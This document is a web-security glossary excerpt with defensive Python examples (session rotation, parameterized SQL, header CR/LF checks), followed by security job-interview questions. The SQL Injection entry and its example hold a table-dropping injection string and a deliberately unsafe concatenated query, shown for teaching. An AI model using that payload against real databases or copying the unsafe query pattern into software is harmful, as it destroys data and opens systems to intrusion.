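As an added example that is not part of the original document, the Python below is a minimal server-side session store that addresses the session entries above together: IDs are drawn from the operating system's CSPRNG (Session Prediction), a fresh ID is issued when the user authenticates so a pre-login value cannot be carried over (Session Fixation), and entries expire and are deleted on logout (Session Replay, Insufficient Session Expiration). The class name, the TTL and the clock injection are constructed for the example.

```python
# Added example (not from the original document): a minimal server-side session
# store covering the glossary's session attacks. Names and the TTL are assumed.
import secrets
import time

SESSION_TTL_SECONDS = 15 * 60  # idle lifetime; an assumed value


class SessionStore:
    def __init__(self, clock=time.time):
        self._clock = clock      # injectable so expiry can be tested deterministically
        self._sessions = {}      # session_id -> {"user": str, "expires": float}

    @staticmethod
    def new_session_id() -> str:
        # 32 bytes from the OS CSPRNG; not derivable from time, counters or user data.
        return secrets.token_urlsafe(32)

    def create(self, user: str) -> str:
        sid = self.new_session_id()
        self._sessions[sid] = {"user": user, "expires": self._clock() + SESSION_TTL_SECONDS}
        return sid

    def login(self, presented_id, user: str) -> str:
        """Authenticate `user` and rotate the session ID: whatever ID the client
        presented before login (possibly planted by a third party) is discarded."""
        self._sessions.pop(presented_id, None)
        return self.create(user)

    def lookup(self, sid):
        """Return the user bound to `sid`, or None if the ID is unknown or expired."""
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        if self._clock() >= entry["expires"]:
            del self._sessions[sid]  # an expired ID cannot be replayed later
            return None
        entry["expires"] = self._clock() + SESSION_TTL_SECONDS  # sliding expiry
        return entry["user"]

    def logout(self, sid) -> None:
        self._sessions.pop(sid, None)


if __name__ == "__main__":
    store = SessionStore()
    anon = store.create("anonymous")
    sid = store.login(anon, "alice")
    print("rotated:", sid != anon, "old valid:", store.lookup(anon), "new:", store.lookup(sid))
```

The ID itself carries no meaning; everything about the session lives server-side, so a guessed or stolen value is the only way in, and the lifetime bound limits how long a stolen value remains useful. In a real deployment the cookie carrying the ID would also be set with the Secure and HttpOnly attributes.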
SQL Injection: An attack technique used to exploit web sites by altering backend
SQL statements through manipulating application input. See also “Parameter
Tampering”, “Form Field Manipulation”. For example, if the backend builds its query as
statement = "SELECT * FROM users WHERE name = '" + userName + "';"
then a crafted value for userName turns the executed statement into
SELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM userinfo
WHERE 't' = 't';
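As an added example that is not part of the original document, the Python below runs the concatenated query from the entry above next to a parameterized one against an in-memory SQLite database, so the difference is observable: a quote-breaking input changes what the concatenated statement matches, while the bound parameter is compared as a plain value. The table contents and the tautology input are constructed; the DROP TABLE input is the one shown in the entry.

```python
# Added example (not from the original document): the glossary's concatenated
# query next to a parameterized one, run against an in-memory SQLite database.
# Table contents and the tautology input are constructed; GLOSSARY_PAYLOAD is
# the input shown in the glossary entry.
import sqlite3

GLOSSARY_PAYLOAD = "a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't"


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT)")
    conn.execute("CREATE TABLE userinfo (name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?)", [("alice",), ("bob",)])
    conn.execute("INSERT INTO userinfo VALUES ('alice')")
    conn.commit()
    return conn


def find_user_unsafe(conn, user_name: str) -> list:
    """The glossary's pattern: the input becomes part of the SQL text.
    Note that sqlite3's execute() refuses more than one statement per call, so the
    DROP TABLE input raises here; executescript() or other drivers would run it."""
    statement = "SELECT * FROM users WHERE name = '" + user_name + "';"
    return sorted(conn.execute(statement).fetchall())


def find_user_safe(conn, user_name: str) -> list:
    """Parameterized query: the input is bound as a value, never parsed as SQL."""
    return sorted(conn.execute("SELECT * FROM users WHERE name = ?", (user_name,)).fetchall())


def table_exists(conn, table: str) -> bool:
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?", (table,)
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    conn = make_db()
    print("unsafe, tautology :", find_user_unsafe(conn, "' OR 't' = 't"))
    print("safe, tautology   :", find_user_safe(conn, "' OR 't' = 't"))
    print("safe, DROP payload:", find_user_safe(conn, GLOSSARY_PAYLOAD), "users exists:", table_exists(conn, "users"))
```

The parameterized form is the fix regardless of driver; input escaping is error-prone and database-specific, and is not a substitute for binding values.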

SSI Injection: A server-side exploit technique that allows an attacker to send code
into a web application, which will be executed by the web server. See also “Meta-
Character Injection”, “Parameter Tampering”, “Form Field Manipulation”.
Transport Layer Security: (Acronym – TLS) The more secure successor to SSL.
The TLS protocol provides communications privacy over the Internet. The protocol
allows client/server applications to communicate in a way that is designed to prevent
eavesdropping, tampering, or message forgery. TLS is based on the SSL protocol,
but the two systems are not interoperable. See also “Secure Sockets Layer”.
Uniform Resource Locator: (Acronym – URL) A standard way of specifying the
location of an object, normally a web page, on the Internet. See also “Parameter
Tampering”.
Unvalidated Input: When a web application does not properly sanity-check user-
supplied data input.
URL Manipulation: Altering or modification of a web application’s parameter name
and value pairs. Also known as “Parameter Tampering”.
User-Agent Manipulation: A technique used to bypass web site browser
requirement restrictions by altering the value sent within an HTTP User-Agent
header. See also “Cookie Manipulation”.
Verbose Messages: Detailed pieces of information revealed by a web site, which
could aid an attacker in exploiting the system.
Visual Verification: A visually oriented method of anti-automation that prevents
automated programs from exercising web site functionality by determining whether a
human is present. See also “Anti-Automation”.
Weak Password Recovery Validation: When a web site permits an attacker to
illegally obtain, change or recover another user’s password. See also “Password
Recovery System”.
Web Application: A software application, executed by a web server, which responds
to dynamic web page requests over HTTP. See also “Web Server”, “Web Service”.
Web Application Scanner: See “Web Application Vulnerability Scanner”.
Web Application Security: Science of information security relating to the World
Wide Web, HTTP and web application software. Also known as “Web Security”.
Web Application Firewall: An intermediary device, sitting between a web-client
and a web server, analyzing OSI Layer-7 messages for violations in the programmed
security policy. A web application firewall is used as a security device protecting the
web server from attack. See also “Web Application Security”, “Web Server”.
Web Application Vulnerability Scanner: An automated security program that
searches for software vulnerabilities within web applications. See also “Web
Application Security”.
Web Browser: A program used to display HyperText Markup Language (HTML) web
pages sent by a web server. See also “ActiveX controls”, “Cookie”, “Java Applets”,
“JavaScript”, “Client-Side Scripting”.
Web (or browser) cache poisoning: Adding or overwriting a cache entry (in a
caching proxy server or a browser) with forged and possibly malicious data. In its
most potent form, an attacker can force an arbitrary entry (URL of choice, page
contents of choice) into the cache. In HTTP response splitting, the attacker can
choose the URL’s path and query (the host, port and scheme must be the vulnerable
host’s) and the entire page contents. In HTTP request smuggling, the attacker can
choose the URL as in HTTP response splitting, but the page contents must be obtained
from a URL on the site. In any case, cache poisoning can be considered a form of
defacement, whose scope is determined by the coverage of the cache (browser: one
user; forward proxy: one ISP or organization; reverse proxy: all users) and the
strength of the attack (full page control over /index.html vs. partial control).
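As an added example that is not part of the original document, the Python below shows the server-side check that closes off the HTTP response splitting route mentioned above: header names and values are refused if they contain CR, LF or NUL, and a redirect target is accepted only as a same-site absolute path, so a user-controlled value can never terminate the header block and begin a second response that a cache would store. Function names and the sample Location values are constructed.

```python
# Added example (not from the original document): serializing an HTTP response
# while refusing CR/LF in header names and values, the injection that makes HTTP
# response splitting (and the cache poisoning it enables) possible. Function
# names and sample values are constructed.
import re

_CTL = re.compile(r"[\r\n\x00]")


def header_value_is_safe(value: str) -> bool:
    """A header name or value may not contain CR, LF or NUL; otherwise an
    attacker-chosen value could end the header block and start a second response."""
    return _CTL.search(value) is None


def is_valid_redirect_target(path: str) -> bool:
    """Accept only a same-site absolute path (no scheme, no //host) for Location."""
    return path.startswith("/") and not path.startswith("//") and header_value_is_safe(path)


def safe_redirect_target(path: str) -> str:
    if not is_valid_redirect_target(path):
        raise ValueError("refusing redirect target: %r" % path)
    return path


def build_response(status: str, headers: list, body: bytes) -> bytes:
    """Serialize an HTTP/1.1 response; raises if any header could split it."""
    lines = ["HTTP/1.1 " + status]
    for name, value in headers:
        if not (header_value_is_safe(name) and header_value_is_safe(value)):
            raise ValueError("CR/LF in header %r" % name)
        lines.append("%s: %s" % (name, value))
    lines.append("Content-Length: %d" % len(body))
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1") + body


def count_status_lines(raw: bytes) -> int:
    """How many responses a proxy parsing this byte stream would see."""
    return raw.count(b"HTTP/1.1 ")


if __name__ == "__main__":
    target = safe_redirect_target("/home")
    print(build_response("302 Found", [("Location", target)], b"").decode("latin-1"))
    print("untrusted value accepted:", is_valid_redirect_target("/home\r\nSet-Cookie: a=b"))
```

Most web frameworks perform the CR/LF check for you when a header is set, but the redirect-target allow-list is application logic and has to be written deliberately; a proxy or browser cache stores whatever response it is handed.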
Web Security: See “Web Application Security”.
Web Security Assessment: A process of performing a security review of a web
application by searching for design flaws, vulnerabilities and inherent weaknesses.
See also “Web Application Security”.
Web Security Scanner: See “Web Application Vulnerability Scanner”.
Web Server: A general-purpose software application that handles and responds to
HTTP requests. A web server may utilize a web application for dynamic web page
content. See also “Web Application”, “Application Server”, “HyperText Transfer
Protocol”.
Web Service: A software application that uses Extensible Markup Language (XML)
formatted messages to communicate over HTTP. Typically, software applications
interact with web services rather than normal users. See also “Web Server”, “Web
Application”, “Application Server”, “HyperText Transfer Protocol”.

General Questions
Q) Why do you want to work for us?
Q) What will you bring to the team?
Q) Have you looked at our website? (Always do research on the company, and be able to ask
them questions about their services.)
Q) Where do you want to be in five years’ time?
Q) What are your main strengths and weaknesses?
Q) Tell me about yourself.
Q) Describe a situation in which you led a team.
Q) Describe a situation where you worked in a team?
Q) What has been your greatest achievement?
Q) What are your hobbies?
Q) What motivates you?

Technical Questions
Q) Which service runs on each of these ports:
22, 80, 21, 25, 137, 3306, 156, 443, 79, 1, 111, 53, 135, 445, 139, 161, 389, 3368, 123, 110, 3269, 636,
500, 4500?
Q) What is SQL injection?
Q) What is XSS?
Q) What are Private IP address?
Q) What is the difference between Encryption, Hashing and Encoding?
Q) Where do you get your security news?
Q) What’s the difference between Symmetric and Asymmetric?
Q) What is the proper sequence of a TCP connection?
Q) What type of password attack would be most successful against the password
T63#s23A?
Q) What is a logic bomb virus?
Q) What are the seven layers of the ISO model?
Q) What command is used to retrieve information from a SQL database?
Q) WEP stands for what?
Q) Data encrypted with the server’s public key can be decrypted with which key?
Q) What are the flags in a TCP header?
Q) What are three insecure protocols?
Q) What’s the difference between TCP and UDP?
Q) What does the ike-scan tool do?
Q) What does APT stand for?
Q) What does ICMP stand for and what does it do?
Q) What are the top ten security vulnerabilities in PHP code?
Q) What is a null session?
Q) What is the difference between Windows 2000 and NT?
Q) How does nmap tell if a UDP port is open or closed?
Q) What is a buffer overflow?
Q) How would you enumerate SMTP?
Q) How does LM hash work?
